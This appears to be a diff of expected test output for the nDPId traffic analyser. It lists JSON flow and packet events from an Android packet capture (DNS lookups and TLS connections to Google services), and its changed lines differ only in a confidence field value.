-01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +02356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01590{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454868559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868559,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8mn0AAHYGKKqs2RIDwKgCEAG7kBpu4mZiXaaGlKAS6yC\/LgAAAgQFZAQCCApPRk15\/\/80RgEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868563,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0stZAAEAGBlnAqAIQrNkSA5AaAbtdpoaUbuJmY4AQAVfXbAAAAQEICv\/\/NE9PRk15"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868527,"flow_last_seen":1582454868563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868563,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 